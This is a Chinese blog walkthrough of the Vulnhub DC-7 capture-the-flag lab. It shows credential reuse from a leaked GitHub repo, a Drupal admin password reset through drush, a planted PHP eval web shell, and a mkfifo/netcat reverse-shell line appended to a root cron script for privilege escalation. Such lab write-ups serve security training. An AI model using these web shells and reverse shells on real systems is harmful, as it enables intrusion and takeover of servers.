看完这篇 教你玩转渗透测试靶机vulnhub——DC7

已于 2024-01-17 15:48:50 修改
阅读量6.1k 收藏 36
点赞数 10
分类专栏: 渗透测试 # Vulnhub靶场 文章标签: vulnhub靶场 DC-7 漏洞利用 web渗透测试 提权
于 2022-04-01 21:08:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aluxian_/article/details/123827661
版权

Vulnhub靶机DC7渗透测试详解

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。

Vulnhub靶机下载:

官网地址:https://download.vulnhub.com/dc/DC-7.zip

Vulnhub靶机安装:

下载好了把安装包解压 然后试用VMware即可。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用netdiscover发现主机
在这里插入图片描述
渗透机:kali IP :192.168.0.103 靶机IP :192.168.0.106

使用命令:nmap -sS -sV -A -n 192.168.0.106

(PS:因为疫情只能再家打靶机ip可能会有些变但是不用在意这些细节!(谁也不能阻止我学习)因为是用VBox打开的所以信息不一样)
在这里插入图片描述
发现开启了80端口和22端口 访问192.168.0.106 又是这个熟悉的界面drupal但是要看他给的提示哦! 大概的意思让我们换一个思路
在这里插入图片描述

DC-7引入了一些“新”概念,但我将留给你们去弄清楚它们是什么。:-)
虽然这个挑战并不完全是技术性的,但如果你需要诉诸暴力或字典攻击,你可能不会成功。
你要做的是跳出框框思考。在盒子外面。:-)

在左下角发现了一个 @DC7USER 处于好奇心 我们百度一下看看 果然第一个就是 GitHub项目 先把他下载下来
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

②:SSH登入:

通过代码审计我们可以看到数据库的账号和密码:dc7userMdR3xOgB7#dW 可以使用ssh登入!!
在这里插入图片描述
ls一下看见了两个文件 一个backups 一个mobx进入backups文件夹,发现两个文件,gpg后缀的!!!第一次见 百度一下看看
gpg是一种基于密钥的加密方式,使用了一对密钥对消息进行加密和解密,来保证消息的安全传输格式是用来加密文件的。

然后再看一下 mbox 文件 cat mbox 发现在/opt/scripts/ 有个可以执行的脚本文件 backups.sh
在这里插入图片描述

cd /opt/scripts/  #进入目录

cat backups.sh #查看文件

在这里插入图片描述
发现了drush 什么是drush????????????? 经过百度查阅发现drushdrupal shell 专门管理drupal站点的shell

进入到/var/www/html目录下,使用drush命令修改admin用户的密码为123456,发现可以修改成功!!!
在这里插入图片描述
但是这里又遇到了一个问题:就是之前admin登入太多次了 所以被禁了 (这里也是做了很久,卡住了)

There have been more than 5 failed login attempts for this account. It is temporarily blocked. Try again later or request a new password.
此帐户已尝试登录失败5次以上。它被暂时封锁了。请稍后再试或请求新密码。

解决方法:使用命令:drush php-eval 'db_query("DELETE FROM flood");' 登入成功!!!
在这里插入图片描述
具体想了解可以参考:https://www.daweibro.com/node/217
在这里插入图片描述

③:漏洞发现与利用:

需要反弹shell,登入成功找到 在Content—>Add content–>Basic page下 需要添加一个PHP模板

https://www.drupal.org/project/php  # 插件下载地址

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz #模块包

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
添加成功!!!! 选第二个即可。选中FILTERS ✔选一下 然后install安装,有个绿色✔就是成功。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
然后在首页进行编辑 添加php木马代码 保存text format 设置为PHP cod 然后使用菜刀进行连接🔗 连接成功!!

GetShell
<?php
@eval($_REQUEST[cmd]);
?>

在这里插入图片描述
在这里插入图片描述
然后 需要把shell 回弹到kali上面 开启监听 nc -lvp 回弹成功 设置交互 python -c 'import pty;pty.spawn("/bin/bash")'
在这里插入图片描述
使用 whoami 命令查看权限 发现比较低 是www-data
在这里插入图片描述

④:提权:

/opt/scripts目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell
在这里插入图片描述echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.0.103 7777 >/tmp/f" >> backups.sh kali设置 nc -lvp
在这里插入图片描述
这里回弹的时间比较久,现在是root权限啦 下一步就是获取flag啦~
在这里插入图片描述

⑤:获取flag:

在这里插入图片描述
至此看到了flag,渗透测试结束。

Vulnhub靶机渗透总结:

这是做的第八个靶场了,学习的知识点和一些细节就是 :
1.这次遇到的问题就是登入后台的时候admin 登入次数太多了被限制了 这里卡了很久后面解决了 可以看上面
解决方法:使用命令:drush php-eval 'db_query("DELETE FROM flood");'

**新知识点:
1.drush8以后需要添加php模板
2.需要学会使用搜索引擎 进行漏洞的信息收集
3.要学会使用给的脚本 并进行漏洞利用 然后进行提权
最后 自己也会把这系列的靶机继续更新,创作不易 希望对大家有所帮助!!

落寞的魚丶
关注
专栏目录
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
这篇 玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5734
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去渗透测试提权漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
【甄选靶场Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权
xnxqwzy的博客
07-29 3471
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.密码爆破(九头蛇)2.图片逆向分析(binwalk(路由逆向分析工具)exiftool(图虫)strings(识别动态库版本指令))3.内核提权(没有gcc的环境的替代方法)
渗透测试】——VulnHub靶机渗透实战 | HA:Joker
最新发布
HinsCoder的博客
09-17 1949
Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场。本文将从环境搭建、端口扫描、目录扫描到信息提取和突破8080端口,尽可能排除新版本遇到的环境Bug,详解介绍渗透测试全过程。如果你是新手小白,本文将带你一窥渗透测试的世界。
Vulnhub】搭建Vulnhub靶机
qq_53058639的博客
01-23 3767
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7999
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
VulnHub渗透实战Billu_b0x
Fly_鹏程万里
06-06 7815
简介VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。官网:https://www.vulnhub.com/参考了一些国外设计靶场...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
[ vulnhub靶机通关 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建程)
qq_51577576的博客
03-14 9537
[ vulnhub靶机通关 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
你怎么用Vulnhub来搭建环境
热门推荐
大方子
09-22 2万+
0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 如果只是练习一些常见的漏洞可以看我另外两用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)从CentOS安装Docker来搭建漏洞靶场到Joomla 3.4.5 反序列化漏洞复现(附批量Getshell脚本) 0x02 下载 https:/...
vulnhub靶场实战系列(一)之vulnhub靶场介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-07 3138
我们在学习了各种web漏洞的原理和各种内网的攻击手法的利用之后,需要实战来提升经验,这一环节就可以有操作系统靶场平台来代替一方面因为靶场是现成的,已经搭建好的靶场,只需要下载到本地用虚拟机安装就可以了,非常省时。第二点,非常安全,我们要知道没有经过法律允许的渗透行为是犯法的,而我们使用靶场来模拟达到实战训练的目的的同时也不会触碰法律。名称描述网站vulnhub与Kali同一家公司(offsec)出品。一共有600多个镜像,可以在VMWare或者VirtualBox打开,有不同难度。
【内网渗透】vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 3718
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
Vulhub漏洞靶场搭建和使用
永远是少年
08-24 1万+
今天继续给大家介绍渗透测试相关知识,本文主要内容是Vulhub漏洞靶场搭建和使用。 一、Vulhub漏洞靶场介绍 二、Vulhub漏洞靶场搭建 (一)安装Docker (二)安装Docker-compose (三)下载Vulhub 三、Vulhub漏洞靶场使用
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 1830
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
Vulhub靶场搭建
qq_52666132的博客
06-26 4175
Vulhub靶场搭建
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值